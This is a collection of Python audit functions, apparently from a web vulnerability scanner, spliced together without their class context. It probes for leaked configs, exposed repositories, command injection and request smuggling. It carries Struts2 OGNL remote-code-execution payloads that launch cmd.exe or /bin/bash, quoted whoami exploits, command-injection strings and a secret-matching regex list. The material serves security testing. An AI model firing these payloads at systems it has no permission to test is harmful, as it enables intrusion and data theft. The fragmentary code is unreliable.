def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
domain = "{}://{}/".format(p.scheme, p.netloc)
if "/wp-content/themes/" not in resp_str:
return
url_lst = [
'/wp-config.php.inc', '/wp-config.inc', '/wp-config.bak',
'/wp-config.php~', '/.wp-config.php.swp', '/wp-config.php.bak'
]
for payload in url_lst:
test_url = domain.rstrip('/') + payload
r = requests.get(test_url, headers=headers)
if r.status_code == 200 and '<?php' in r.text:
out.success(test_url, self.name)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
domain = "{}://{}/".format(p.scheme, p.netloc) + random_str(6) + ".jsp"
re_list = {
"ASPNETPathDisclosure":
"<title>Invalid\sfile\sname\sfor\smonitoring:\s'([^']*)'\.\sFile\snames\sfor\smonitoring\smust\shave\sabsolute\spaths\,\sand\sno\swildcards\.<\/title>",
"Struts2DevMod":
"You are seeing this page because development mode is enabled. Development mode, or devMode, enables extra",
"Django DEBUG MODEL":
"You're seeing this error because you have <code>DEBUG = True<\/code> in",
"RailsDevMode":
"<title>Action Controller: Exception caught<\/title>",
"RequiredParameter":
"Required\s\w+\sparameter\s'([^']+?)'\sis\snot\spresent",
"Thinkphp3 Debug": '<p class="face">:\(</p>'
}
r = requests.get(domain, headers=headers)
for k, v in re_list.items():
if re.search(v, r.text, re.S | re.I):
out.success(domain, self.name, name=k)
break
def _javascript_redirect(self, response: requests.Response):
"""
Test for JavaScript redirects, these are some common redirects:
// These also work without the `window.` at the beginning
window.location = "http://www.w3af.org/";
window.location.href = "http://www.w3af.org/";
window.location.replace("http://www.w3af.org");
window.location.assign('http://www.w3af.org');
self.location = 'http://www.w3af.org';
top.location = 'http://www.w3af.org';
// jQuery
$(location).attr('href', 'http://www.w3af.org');
$(window).attr('location', 'http://www.w3af.org');
$(location).prop('href', 'http://www.w3af.org');
// Only for old IE
window.navigate('http://www.w3af.org');
"""
for statement in self._extract_script_code(response):
if self.test_domain not in statement:
continue
out.success(self.uri,
self.name,
msg="当前JavaScript脚本发现被注入url,在 {}".format(statement))
return False
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode(self.response.decoding
or 'utf-8')
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
js_links = js_extractor(resp_str)
result = []
ret = main_scanner(url, resp_str)
if ret:
result.append(ret)
for link in js_links:
ret2 = main_scanner(link, '')
if ret2:
result.append(ret2)
for res in result:
out.success(url, self.name, **res)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "PHP":
return
variants = [
"phpinfo.php",
"pi.php",
"php.php",
"i.php",
"test.php",
"temp.php",
"info.php",
]
for phpinfo in variants:
testURL = url.strip('/') + "/" + phpinfo
r = requests.get(testURL, headers=headers)
if "<title>phpinfo()</title>" in r.text:
info = get_phpinfo(r.text)
out.success(testURL, self.name, info=info)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
# phpinfo
if "<title>phpinfo()</title>" in resp_str:
info = get_phpinfo(resp_str)
out.success(url, self.name, info=info)
for func in [sensitive_idcard, sensitive_bankcard]:
rets = func(resp_str)
if rets:
for ret in rets:
content = ret["content"]
if not isinstance(content, str):
content = str(content)
if out.set(content):
out.success(url,
self.name,
content=content,
type=ret["type"])
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
flag = {
"/.svn/all-wcprops": "svn:wc:ra_dav:version-url",
"/.git/config": 'repositoryformatversion[\s\S]*',
"/.bzr/README": 'This\sis\sa\sBazaar[\s\S]',
'/CVS/Root': ':pserver:[\s\S]*?:[\s\S]*',
'/.hg/requires': '^revlogv1.*'
}
for f in flag.keys():
_ = url.rstrip('/') + f
try:
r = requests.get(_, headers=headers)
if re.search(flag[f], r.text, re.I | re.S | re.M):
out.success(_, self.name)
except Exception as e:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
post_hint = self.requests.post_hint
post_data = self.requests.post_data
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
# 手机号
regx_phone = r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}'
# 身份证
regx_identify = r'([1-9]\d{5}[12]\d{3}(0[1-9]|1[012])(0[1-9]|[12][0-9]|3[01])\d{3}[0-9xX])'
for _ in [regx_phone, regx_identify]:
texts = re.findall(_, resp_str, re.M | re.I)
if texts:
for i in set(texts):
if out.set(i):
out.success(url, self.name, method='POST', info=i)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
check= '<Struts2-vuln-Check>'
payloads = [
r"%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('<'+'Struts2-vuln-'+'Check>')).(#o.close())}",
r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#[email protected]@getRequest()).(#path=#req.getRealPath('Struts2-vuln-'+'Check>')).(#o.println(#path)).(#o.close())}",
r'''%{(#f**k='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse().getWriter()).(#outstr.println(#req.getRealPath("Struts2-vuln-"+"Check>"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'''
]
for payload in payloads:
headers['Content-Type']= payload
r = requests.get(url, headers=headers)
html1 = r.text
if check in html1:
out.success(url, self.name, playload="{}:{}".format('Content-Type',payload), method=method,check=check,raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
domain = "{}://{}/".format(p.scheme, p.netloc)
payloads = self.generate()
for payload in payloads:
test_url = domain.rstrip('/') + payload["path"]
r = requests.get(test_url, headers=headers)
if r.status_code != 200:
continue
if payload["tag"]:
if payload["tag"] not in r.text:
continue
if payload["content-type"]:
if payload['content-type'] not in r.headers.get(
'Content-Type', ''):
continue
if payload["content-type_no"]:
if payload["content-type_no"] in r.headers.get(
'Content-Type', ''):
continue
out.success(test_url, self.name)
def _check(self, k, v, method, url, data):
# ret = is_base64(v)
# if ret and len(ret) >= 6:
# if method == "GET":
# out.success(url, self.name, method=method, parameter=k + ":" + v, base64decode=ret)
# elif method == "POST":
# out.success(url, self.name, method=method, parameter=k + ":" + v, base64decode=ret, data=str(data))
whats = None
if isJavaObjectDeserialization(v):
whats = "JavaObjectDeserialization"
elif isPHPObjectDeserialization(v):
whats = "PHPObjectDeserialization"
elif isPythonObjectDeserialization(v):
whats = "PythonObjectDeserialization"
if whats:
if method == "GET":
out.success(url,
self.name,
method=method,
parameter=k + ":" + v,
what=whats)
elif method == "POST":
out.success(url,
self.name,
method=method,
parameter=k + ":" + v,
what=whats,
data=str(data))
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
cycle = 5
timeout = 30
if self.response.status != 200:
return
# request_smuggling_cl_te
for i in range(cycle):
payload_headers = {
"Content-Length": "6",
"Transfer-Encoding": "chunked"
}
data = b'0\r\n\r\nS'.decode()
temp_header = headers.copy()
for k, v in payload_headers.items():
if k.lower() in temp_header:
temp_header[k.lower()] = v
else:
temp_header[k] = v
try:
r = requests.post(url, headers=temp_header, data=data, timeout=30)
except:
continue
if r.status_code == 403 and resp_str != r.text:
out.success(url, self.name, method='POST', **payload_headers, type="CL.TE型", data='0\\r\\n\\r\\nS', )
return
# request_smuggling_te_cl
for i in range(cycle+1):
payload_headers = {
"Content-Length": "3",
"Transfer-Encoding": "chunked"
}
data = b'1\r\nD\r\n0\r\n\r\n'.decode()
req = Request('POST', url, data=data, headers=headers)
prepped = req.prepare()
for k, v in payload_headers.items():
if k.lower() in prepped.headers:
del prepped.headers[k.lower()]
prepped.headers[k] = v
s = Session()
try:
r = s.send(prepped)
except:
continue
if r.status_code == 403 and resp_str != r.text:
out.success(url, self.name, method='POST', **payload_headers, type="TE.CL型",
data='1\\r\\nD\\r\\n0\\r\\n\\r\\nS')
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
cookies = self.requests.cookies
if method == 'GET':
if p.query == '':
return
if not cookies or len(cookies) == 0:
return
for k, v in cookies.items():
if v.lower() not in resp_str.lower():
continue
payload = "[<{}>]2333_w13scan"
data = copy.deepcopy(cookies)
data[k] = v + payload
r = requests.get(url, cookies=data, headers=headers)
if payload in r.text:
out.success(url,
self.name,
cookie="{}:{}".format(k, data[k]),
raw=r.raw)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
variants = ["/sftp-config.json", "/recentservers.xml"]
for f in variants:
_ = url.rstrip('/') + f
try:
r = requests.get(_, headers=headers)
if re.search(
r'("type":[\s\S]*?"host":[\s\S]*?"user":[\s\S]*?"password":[\s\S]*")',
r.text, re.I | re.S | re.M):
out.success(_, self.name)
elif re.search(r'(<Pass>[\s\S]*?<\/Pass>)', r.text, re.I):
out.success(_, self.name)
except Exception as e:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
combine = '^\S+\(\{.*?\}\)'
domain = "{}://{}".format(p.scheme, p.netloc) + random_str(
4, string.ascii_lowercase + string.digits) + ".com/"
sensitive_params = [
'mail', 'user', 'name', 'ip', 'pass', 'add', 'phone'
]
if re.match(combine, resp_str, re.I | re.S):
# 判断是否为jsonp
headers["Referer"] = domain
if method == 'GET':
r = requests.get(url, headers=headers)
if GetRatio(resp_str, r.text) >= 0.8:
for i in sensitive_params:
if i in r.text.lower():
res = {
"Referer": domain,
"keyword": i,
"Content-Type":
r.headers.get("Content-Type", "")
}
response = self.jsonp_load(r.text)
if response:
res["response"] = response
if len(response) > 500:
res["response"] = "数据太多,自行访问"
out.success(url, self.name, **res)
elif re.match(JSON_RECOGNITION_REGEX, resp_str,
re.I | re.S) and 'callback' not in url:
# 不是jsonp,是json
headers["Referer"] = domain
params["callback"] = random_str(2)
if method == 'GET':
r = requests.get(netloc, params=params, headers=headers)
if r.text.startswith(params["callback"] + "({"):
res = {
"Referer": domain,
"Content-Type": r.headers.get("Content-Type", ""),
"callback": params["callback"],
}
response = self.jsonp_load(r.text)
if response:
res["response"] = response
if len(response) > 500:
res["response"] = "数据太多,自行访问"
out.success(r.url, self.name, **res)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
randint = random.randint(1000, 9000)
url_flag = {
"set|set&set": [
'Path=[\s\S]*?PWD=', 'Path=[\s\S]*?PATHEXT=',
'Path=[\s\S]*?SHELL=', 'Path\x3d[\s\S]*?PWD\x3d',
'Path\x3d[\s\S]*?PATHEXT\x3d', 'Path\x3d[\s\S]*?SHELL\x3d',
'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
'Non-authoritative\sanswer:\s+Name:\s*',
'Server:\s*.*?\nAddress:\s*'
],
"echo `echo 6162983|base64`6162983".format(randint):
["NjE2Mjk4Mwo=6162983"]
}
if not self.response.system or self.response.system == "WINDOWS":
del url_flag["echo `echo 6162983|base64`6162983".format(
randint)]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for spli in ['', ';']:
for flag, re_list in url_flag.items():
if spli == "":
data[k] = flag
else:
data[k] = v + spli + flag
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
for rule in re_list:
if re.search(rule, html1, re.I | re.S | re.M):
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]),
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
payloads = self.generate()
success = []
for payload in payloads:
test_url = url.rstrip('/') + payload["path"]
try:
r = requests.get(test_url,
headers=headers,
allow_redirects=False)
except:
continue
if r.status_code != 200:
continue
if payload["tag"]:
if payload["tag"] not in r.text:
continue
if payload["content-type"]:
if payload['content-type'] not in r.headers.get(
'Content-Type', ''):
continue
if payload["content-type_no"]:
if payload["content-type_no"] in r.headers.get(
'Content-Type', ''):
continue
success.append({"url": test_url, "len": len(r.text)})
if success:
if len(success) < 10:
for i in success:
out.success(i["url"], self.name)
else:
result = {}
for item in success:
length = item.get("len", 0)
if length not in result:
result[length] = list()
result[length].append(item["url"])
for k, v in result.items():
if len(v) > 5:
continue
else:
for i in v:
out.success(i, self.name)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
version = self.requests.request_version # HTTP 0.9/1.0/1.1
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
checks = [
str(ran_check), '无法初始化设备 PRN', '??????? PRN',
'<Struts2-vuln-Check>', 'Unable to initialize device PRN'
]
boundary_046 = "---------------------------735323031399963166993862150"
payloads = [
r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='print test').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"
+ lin +
r"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('<'+'Struts2-vuln-'+'Check>')).(#o.close())}",
r"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#[email protected]@getRequest()).(#path=#req.getRealPath('Struts2-vuln-')).(#o.print(#path)).(#o.print('Check>')).(#o.close())}"
]
headers[
'Content-Type'] = 'multipart/form-data; boundary=' + boundary_046 + ''
for payload in payloads:
data_046 = '--' + boundary_046 + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + payload + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary_046 + "--"
r = requests.post(url, headers=headers, data=data_046)
html1 = r.text
for check in checks:
if check in html1:
out.success(url,
self.name,
playload="{}".format(payload),
method="POST",
check=check,
raw=r.raw)
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
post_hint = self.requests.post_hint
post_data = self.requests.post_data
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
if post_hint == POST_HINT.NORMAL:
randint = random.randint(1000, 9000)
url_flag = {
"set|set&set": [
'Path=[\s\S]*?PWD=',
'Path=[\s\S]*?PATHEXT=',
'Path=[\s\S]*?SHELL=',
'Path\x3d[\s\S]*?PWD\x3d',
'Path\x3d[\s\S]*?PATHEXT\x3d',
'Path\x3d[\s\S]*?SHELL\x3d',
'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
'Non-authoritative\sanswer:\s+Name:\s*',
'Server:\s*.*?\nAddress:\s*'
],
"echo `echo 6162983|base64`6162983".format(randint): [
"NjE2Mjk4Mwo=6162983"
]
}
for k, v in post_data.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(post_data)
for spli in ['', ';']:
for flag, re_list in url_flag.items():
if spli == "":
data[k] = flag
else:
data[k] = v + spli + flag
r = requests.post(url, data=data, headers=headers)
html1 = r.text
for rule in re_list:
if re.search(rule, html1, re.I | re.S | re.M):
out.success(url, self.name, payload="{}:{}".format(k, data[k]), method=method,
data=str(data), raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
version = self.requests.request_version # HTTP 0.9/1.0/1.1
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if self.response.language and self.response.language != "JAVA":
return
if method == 'GET':
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
checks = [str(ran_check), '<Struts2-vuln-Check>']
payloads = [
'${{{}-{}}}/'.format(ran_a, ran_b),
# 2.3.20 版本的命令执行如下:
# from https://github.com/Ivan1ee/struts2-057-exp
# /%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
# 修改了下,不执行命令只打印
r'%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28%27%3cStruts2-vuln-%27%29%29.%28%23w.print%28%27Check%3e%27%29%29.%28%23w.close%28%29%29%7D/'
# 2.3.34 版本的命令执行如下:
# /%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
r'%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28%27%3cStruts2-vuln-%27%29%29.%28%23w.print%28%27Check%3e%27%29%29.%28%23w.close%28%29%29%7D/'
]
url1 = get_parent_paths(netloc)
if not url1:
return
url1 = url1[0]
_suffix = url.split('/')[-1]
for payload in payloads:
r = requests.get(url1 + payload + _suffix,
headers=headers,
allow_redirects=False)
for check in checks:
if check in str(r.headers) or check in r.text:
out.success(url,
self.name,
playload="{}".format(payload),
method="GET",
check=check,
raw=r.raw)
return
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode(self.response.decoding or 'utf-8')
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
exi = os.path.splitext(p.path)[1]
if exi not in ['.js']:
return
# print(url)
regx = [
# 匹配url
r'(\b|\'|")(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do)(\b|\'|")',
# 匹配邮箱
r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
# 匹配token或者密码泄露
# 例如token = xxxxxxxx, 或者"apikey" : "xssss"
r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|email|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|api_key|apikey|userid|user_id|user-id)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}"?',
# 匹配IP地址
r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
# 匹配云泄露
r'[\w]+\.cloudfront\.net',
r'[\w\-.]+\.appspot\.com',
r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
r'(storage\.cloud\.google\.com\/[\w\-.]+)',
r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
# 匹配手机号
r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}'
# 匹配域名
r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))',
]
dom_xss = [
'location\.hash',
'location\.href',
'location\.search'
]
regx.extend(dom_xss)
for _ in regx:
texts = re.findall(_, resp_str, re.M | re.I)
if texts:
for i in set(texts):
